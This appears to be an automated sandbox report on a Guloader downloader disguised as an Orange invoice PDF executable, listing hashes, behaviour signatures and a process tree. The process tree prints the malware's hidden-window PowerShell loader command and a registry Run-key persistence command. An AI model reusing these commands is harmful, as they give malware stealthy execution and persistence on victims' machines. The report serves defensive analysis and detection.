Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 09:49
Static task
static1
Behavioral task
behavioral1
Sample
Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
Resource
win10v2004-20240704-en
General
-
Target
Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
-
Size
398KB
-
MD5
b1c35e78f5d588430c4f534479def9f2
-
SHA1
f787dd3327ca04361935f74867f76f16821db99f
-
SHA256
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
-
SHA512
5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c
-
SSDEEP
12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2908 wab.exe 2908 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2428 powershell.exe 2908 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2428 set thread context of 2908 2428 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2428 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exepowershell.exewab.execmd.exedescription pid process target process PID 328 wrote to memory of 2428 328 Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe powershell.exe PID 328 wrote to memory of 2428 328 Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe powershell.exe PID 328 wrote to memory of 2428 328 Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe powershell.exe PID 328 wrote to memory of 2428 328 Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe powershell.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2428 wrote to memory of 2908 2428 powershell.exe wab.exe PID 2908 wrote to memory of 2792 2908 wab.exe cmd.exe PID 2908 wrote to memory of 2792 2908 wab.exe cmd.exe PID 2908 wrote to memory of 2792 2908 wab.exe cmd.exe PID 2908 wrote to memory of 2792 2908 wab.exe cmd.exe PID 2792 wrote to memory of 2788 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2788 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2788 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2788 2792 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"4⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344KB
MD51a78d0f226d0db154812e61b8cadb4b8
SHA1e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e
SHA25619997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e
SHA512b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41
-
Filesize
68KB
MD5d89dac6d6bcfb431c31bdf7d21f48fbd
SHA12f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA51276eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070